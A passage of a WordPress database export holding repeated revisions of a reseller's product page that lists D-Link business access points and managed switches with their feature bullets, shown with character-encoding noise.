<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Built-in SNMP MIB for remote NetworkÂ Management Systems</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2019-09-25 12:29:28','2019-09-25 04:29:28','',1480,'https://bintara.com.my/blog/2019/09/25/1480-revision-v1/',0,'revision','',0),(3362,1,'2019-09-25 12:29:51','2019-09-25 04:29:51','<h2>D - Link Business Solution Product </h2>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"500\" height=\"500\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w\" sizes=\"(max-width: 500px) 100vw, 500px\" />											\n		<p>Â 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>Weather-proof design (IPX6) built to withstand harsh environments</p><p>Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>Provides WLAN partitioning for deployments such as wireless hot spots</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>â€¢ MU-MIMO with beamforming</p><p>â€¢ Band steering</p><p>â€¢ Gigabit PoE-capable LAN port</p><p>â€¢ AP Array utility support</p><p>â€¢ Free D-Link Central WiFiManager</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Enjoy High-performance Wireless Connectivity</p><p>â€“ Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><p>MU-MIMO with Beamforming</p><p>â€“ Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><p>Multiple Operational Modes</p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ High-speed wireless performance with 300 Mbps wireless signal rates</p><p>â€¢ Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>â€¢ Gigabit Ethernet port with 802.3af Power over Ethernet</p><p>â€¢ Multiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>â€¢ Support Inbuilt Radius server, Network Access protection (NAP)</p><p>â€¢ Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>â€¢ Support Central WiFi Manager to configure and manage multiple AP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports<br />â€¢ Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP<br />â€¢ Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br />â€¢ Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Access Control List (ACL) feature to enhances network security<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Built-in SNMP MIB for remote NetworkÂ Management Systems</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2019-09-25 12:29:51','2019-09-25 04:29:51','',1480,'https://bintara.com.my/blog/2019/09/25/1480-revision-v1/',0,'revision','',0),(3363,1,'2019-09-25 12:31:38','2019-09-25 04:31:38','<h2>D - Link Business Solution Product </h2>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"500\" height=\"500\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w\" sizes=\"(max-width: 500px) 100vw, 500px\" />											\n		<p>Â 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>Weather-proof design (IPX6) built to withstand harsh environments</p><p>Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>Provides WLAN partitioning for deployments such as wireless hot spots</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>â€¢ MU-MIMO with beamforming</p><p>â€¢ Band steering</p><p>â€¢ Gigabit PoE-capable LAN port</p><p>â€¢ AP Array utility support</p><p>â€¢ Free D-Link Central WiFiManager</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Enjoy High-performance Wireless Connectivity</p><p>â€“ Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><p>MU-MIMO with Beamforming</p><p>â€“ Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><p>Multiple Operational Modes</p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ High-speed wireless performance with 300 Mbps wireless signal rates</p><p>â€¢ Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>â€¢ Gigabit Ethernet port with 802.3af Power over Ethernet</p><p>â€¢ Multiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>â€¢ Support Inbuilt Radius server, Network Access protection (NAP)</p><p>â€¢ Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>â€¢ Support Central WiFi Manager to configure and manage multiple AP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" 